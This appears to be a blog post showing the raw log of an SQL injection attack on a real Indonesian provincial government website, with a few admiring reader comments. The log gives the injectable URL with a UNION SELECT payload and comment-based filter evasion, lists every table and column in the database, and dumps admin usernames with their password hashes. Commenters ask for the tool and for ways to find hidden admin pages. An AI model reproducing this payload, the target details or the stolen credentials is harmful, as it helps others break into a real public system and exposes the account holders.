Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0]sulut
[1]test
[-] [16:48:42]
[-] Total URL Requests 4
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:58
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing Tables & Columns from database "sulut"
[+] Number of Tables: 81
[Database]: sulut
[Table: Columns]
[0]arsip: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[1]artikel: berita_id,tanggal,judul,isi,foto,penulis,alamat,email,klik
[2]bapedal: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[3]berita: berita_id,tanggal,judul,topik,isi,penulis,klik,ses
[4]bkkbn: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[5]cuaca: cuaca_id,imageCuaca,iklim,kelembaman
[6]data_instansi: dataID,kodeInstansi,tahunData,judulData,isiData
[7]diklat: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[8]diknas: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[9]dipenda: utamaID,kodeUtama,nomorUtama,judulUtama,uraianUtama,gambarUtama
[10]direktori: direktoriID,kodeInfo,juduldirektori,namadirektori,urldirektori
[11]diskom: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[12]distamben: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[13]dprd: dprdID,kodeJabatan,nomorJabatan,nama,namaJabatan,asaldprd
[14]dy_agenda: id,thn,bln,tgl,nama,keterangan
[15]dy_config: Name,Value
[16]dy_content: id,name,vname,description,text,date,auth,publish,access,position,ordered
[17]dy_content_c: id,name,vname,description,text,date,auth,publish,access,ordered,content_id
[18]dy_gbook: id,name,email,location,url,comments,date,status,iplog
[19]dy_links: name,url
[20]dy_module: Name,VName,Vimg,Access,status,staff,ordered
[21]dy_photo: id,photo,width,height,size,deskripsi,auth,date,fname,kategori,STATUS
[22]dy_photo_category: id,cname,name,access,status,type
[23]dy_photo_comment: id,pid,date,status,name,address,email,url,text,vemail,vurl,iplog
[24]dy_section: Name,VName,Vimg,Access,status,staff,ordered
[25]dy_sms: id,name,email,lokasi,msg,date,aktif
[26]dy_sosok: id,date,nama,text,photo,auth,aktif,hit
[27]dy_user: id,username,fullname,password,mode,modeDesc,telp,mobile,lastlogin,ustaff,email,status,ukey
[28]dy_user_pm: id,sender,to_user,subject,text,status,date
[29]dy_usermode: Mode,modeDesc
[30]dy_userstaff: id,Name
[31]fotosulut: pictureID,kodePicture,judulPicture,linkPicture,namaPicture,uraianPicture,titlePicture,descPicture
[32]infoumum: infoumumID,priorNumber,kodeInfo,judulInfoumum,titleInfoumum,namaInfoumum,alamatInfoumum,telponInfoumum,faxInfoumum,mailInfoumum,urlInfoumum
[33]infrastruktur: infraID,kodeInfra,judulInfra,uraianInfra,titleInfra,descInfra,gambarInfra
[34]instansi: instansiID,nomorID,kodeInstansi,namaPejabat,nipInstansi,pktInstansi,lahirInstansi,fotoPejabat,alamatInstansi,telponInstansi,faxInstansi,mailInstansi,urlInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[35]jajak: id,topik,pil1,pil2,pil3,vote1,vote2,vote3
[36]kehutanan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[37]kesbang: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[38]kesehatan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[39]kesos: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[40]koperasi: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[41]kurs: kursID,nomorKurs,uraianKurs,jualKurs,beliKurs
[42]menu_direktori: infoID,kode,uraianInfo
[43]menu_dprd: dprdID,kodeDprd,uraianDprd
[44]menu_fraksi: dprdID,kodeDprd,uraianDprd
[45]menu_galeri: galeriID,uraianGaleri
[46]menu_infoumum: infoID,kode,uraianInfo
[47]menu_infrastruktur: infraID,kodeInfra,uraianInfra
[48]menu_instansi: instansiID,kodeInstansi,uraianInstansi
[49]menu_pejabat: pejabatID,kodePejabat,uraianPejabat
[50]menu_pemerintahan: pemerintahanID,kodeMenu,uraianPemerintahan
[51]menu_perisinan: infoID,kode,uraianInfo
[52]menu_riwayat: riwayatID,kodeRiwayat,uraianRiwayat
[53]menu_sekilas: sekilasID,kodeSekilas,uraianSekilas
[54]menu_sektor: sektorID,kodeSektor,uraianSektor
[55]menu_tahun: infoID,kode,uraianInfo
[56]nama_instansi: namaID,kodeInstansi,kodenama,namaInstansi,alamatInstansi,telponInstansi,urlInstansi
[57]objekwisata: wisataID,kodeWisata,judulWisata,uraianWisata,gambarWisata,titleWisata,descWisata
[58]pariwisata: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[59]pejabat: pejabatID,kodeUnit,namaPejabat,nipPejabat,pktPejabat,lahirPejabat,fotoPejabat,urlPejabat
[60]peluang_investasi: investasiID,judulInvestasi,isiInvestasi,sumberInvestasi,klikInvestasi,titleInvestasi,descInvestasi
[61]pemerintahan: pemerintahanID,kodePemerintahan,judulPemerintahan,uraianPemerintahan,titlePemerintahan,descPemerintahan
[62]penduduk: pendudukID,tahunPenduduk,kabkotaPenduduk,lakiPenduduk,perempuanPenduduk,coba
[63]peraturan: perisinanID,perisinanIDkode,perisinanNomor,tahun,perisinanTopik,perisinanFile,perisinanContent
[64]perhubungan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[65]pmd: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[66]potensi_investasi: potensiID,kodeSektor,komoditasPotensi,kapasitasPotensi,investasiPotensi,lokasiPotensi,ketPotensi
[67]potensikecamatan: potensiID,kdKabupaten,kdKecamatan,judulPotensi,uraianPotensi
[68]praskim: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[69]program: program_id,judul,isi
[70]riwayat: riwayatID,kodeUnit,kodeRiwayat,tahunRiwayat,uraianRiwayat
[71]sekilas: sekilasID,judulSekilas,uraianSekilas,titleSekilas,descSekilas,foto
[72]statistik: statistikID,sektorStatistik,tahunStatistik,judulStatistik,fileStatistik
[73]sumber: sumber_id,kode,topik
[74]test: field1,field2,field3,field4,field5
[75]topik: topikID,kriteria,namaTopik
[76]tupoksi: tupoksiID,kodeInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[77]user_admin: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[78]user_group: userGroupID,userGroupName,userGroupDesc
[79]user_sulut: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[-] [17:13:55]
[-] Total URL Requests 458
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:16:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 4
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:17:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4
[0] admin:7d4aff1e876d0d969e2dd3083c344faa
[1] vendhy:610b8251af8ae12ad9d1a4508b243fa6
[2] psit02:82027888c5bb8fc395411cb6804a066c
[3] psit07:e1c91b6b6117f93c1c8734a22acffc2d
[-] [17:17:21]
[-] Total URL Requests 6
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:19:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "user_admin"
[+] Column(s) ['userUserName', 'userPassword']
[+] Number of Rows: 2
[0] glory:4f35ffc581dfecea4db9e25f27d17cd9
[1] kpsit:f8aa5e424bf3e7c8e3e400c906b10465
[-] [17:20:08]
[-] Total URL Requests 4
[-] Done
bagus mas. :D
ReplyDeletemas viperfx07 pake tools apa?
boleh aku minta? sekalian cara pake nya ^_*
ini email ku whiza@telkom.net
thx b4
salam
bro. kalau mau mencari page administrator yang di sembunyikan gimana ya?
ReplyDeletethanks before